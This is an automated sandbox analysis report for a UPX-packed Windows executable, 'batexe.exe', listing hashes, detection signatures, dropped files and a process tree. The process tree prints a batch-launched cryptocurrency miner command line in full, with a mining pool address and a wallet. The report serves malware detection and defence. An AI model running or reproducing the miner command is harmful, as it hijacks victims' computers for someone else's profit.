Analysis

  • max time kernel
    296s
  • max time network
    299s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    11-02-2024 23:44

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:520
    • C:\Users\Admin\AppData\Local\Temp\10C4.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\10C4.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\10C4.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4304
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1623.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4860
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3304

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\10C4.tmp\b2e.exe

    Filesize

    3.8MB

    MD5

    bcb05e7a0b2ed370b3b4c0a41c42c760

    SHA1

    800a5b843f051a1094052324d3f750cae7d1c6af

    SHA256

    1d538a97e8632e3a8cf176b046da4b3a8237ac1c3f7893495b41d6fc25797ea5

    SHA512

    307633f58b19e0ebbf4a047e8d75cf668c9210a93d42a4f0400ac3d92f20fa1696110166fed54abd074da3d6249c40f7e2028db56de323b1a50c744e589494c9

  • C:\Users\Admin\AppData\Local\Temp\10C4.tmp\b2e.exe

    Filesize

    3.1MB

    MD5

    d313455a14b211532dd1379a1cad2238

    SHA1

    d1bbb671df32ca5cedbdf3f5ccb03b38ada86c30

    SHA256

    481177c2f08b0a6952539a8a7fa9bd380f8163fccebeb0ab0a8dae354e74bf0f

    SHA512

    faeec127c0ac8e32860384bceff0055054a0c67b7d396cfcf9406a07b5408692c213ca64e680724ebfe745045de7d027180bbff8c744607f5230d5cef177b4db

  • C:\Users\Admin\AppData\Local\Temp\1623.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    869KB

    MD5

    858136c12f25d88183777e484594fbcb

    SHA1

    5f962d090714035f2467e3f0860ef2a0e6818256

    SHA256

    06166e154bbc32e170851324040d42ff3bfa01faa897b7a840b8c85d264000a9

    SHA512

    0af2b6f423a8794cbbcddd2750e335d0523e79813d2e09f5aea0267794b977eef9e1d9fb4c2be93f07bb27af519c3a3108b1a281088705869831f19db883ff77

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    1.1MB

    MD5

    d63702d6e44cbd311b774abb27b2f456

    SHA1

    1aaf884dc8ccf868b1838fef04dd9b9324b06b0c

    SHA256

    37e3667dbbf09de6aba21f889e2f960ce9182db15291cfe2242bab769705f257

    SHA512

    fbeb4f9a50d6161e272f95d0f44af3d4aacc31792eaa8c3e40839d74fc6257c1c01862828e96777ff233563ee24425a2e0bb96a8dd3ede0eece35f68559d4ab8

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    711KB

    MD5

    b350c16e9e6d0a6372c7a961901602e0

    SHA1

    3f87019de710a54de1a71918ac38caa09c553098

    SHA256

    33866530e66e2812cf772dcd7733a297e905a55bede24ad078bdf2849974ce2e

    SHA512

    4ffc8cc8d32bf3e9b46db1bdee7099382b7a6bf2751629052d7433d64599d9e0703f5ac2fca0506e6a8018147a1748bb1424ef6f68c25436c6cf952be57cbdc4

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.2MB

    MD5

    b9d328364ee681774f67e9cb495f5bac

    SHA1

    1bec81d9f0daead4a15def83cbb9b411ad47dd6a

    SHA256

    bfaf0296f5158a8f781d2239b523ac755ddb08796ef53dfc5555c1e95495e439

    SHA512

    35d274ea3a5395dedcb1a0eb535af8be7e47047d0a9ae56c11099e1ee5d619d363a1e09b00192dfda82e3f122acda5a41e1033d9e5965a41404fd7e40bb377ef

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    801KB

    MD5

    6446635f2c48bef4d8646eb184ee066c

    SHA1

    c855e3e387a0f54eb9c03002dd9bdfa1a64be55e

    SHA256

    65bfd69c7af2143e67873e34b41e3a1b7b0444380fbed07509d7699f238e0c86

    SHA512

    aa4ef38020c810a82127acc0ff0305081f93d43473f8f65ca86d606e665657f3c9c2373d569f95df3f8100e5e1ef6d2597b3d7f59605589aa18736d3c7cc78d8

  • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.0MB

    MD5

    c2153796a9d5eb2295ef7547c572b43c

    SHA1

    33d93ef3d3d0b69ec1f30fed28c70bf8edd5bba7

    SHA256

    ed3a5e07133f6cad48de2c070928c52907c2af91eeca0a74ed181324b806fdd0

    SHA512

    2396a72d6c59946ff3fd46521f5638ba8abd17746e0477b3b8fee6fe8883d2444633b7d0df52cdb48ee218da25953d25d706733089d693e974777799029f8332

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    871KB

    MD5

    5c4938838bd045ef28081652e4cd8974

    SHA1

    e0ba0bab3c8f162eaad57c21ded9d10a70c80528

    SHA256

    40ab18a11a119382398741b6d55eede4218c71f2881d71cfcb1f8f8c6df7ff0e

    SHA512

    c4119162326d953a5c8620099f730fc27060094262bab913aa511babd67b2c9492fcdfad0c52e4204857fe5ceb8b77f74cf405b3130c10d71310e07096093f4d

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    909KB

    MD5

    73cf68aca096b69e27a9a9d09f179d3c

    SHA1

    d44d43f61897f87d4735f58510cf7e33454c10fa

    SHA256

    4308e1ed33391e78816c186e1fa973617fc0dec1af7bd36a889986b1d08e4669

    SHA512

    ebf40618e3a7871f84152f879d3a92cbfabfa99c1a6b468dadcbfa936efb71aee52317af83e9309cc7d643ee3375c9e7e58cc79e88eb49cd44396a3e1cf2d6f0

  • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/520-5-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/3304-43-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/3304-101-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3304-42-0x0000000068830000-0x00000000688C8000-memory.dmp

    Filesize

    608KB

  • memory/3304-41-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/3304-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3304-44-0x0000000001160000-0x0000000002A15000-memory.dmp

    Filesize

    24.7MB

  • memory/3304-45-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3304-96-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3304-56-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3304-61-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3304-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3304-71-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3304-86-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3304-91-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4304-6-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4304-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB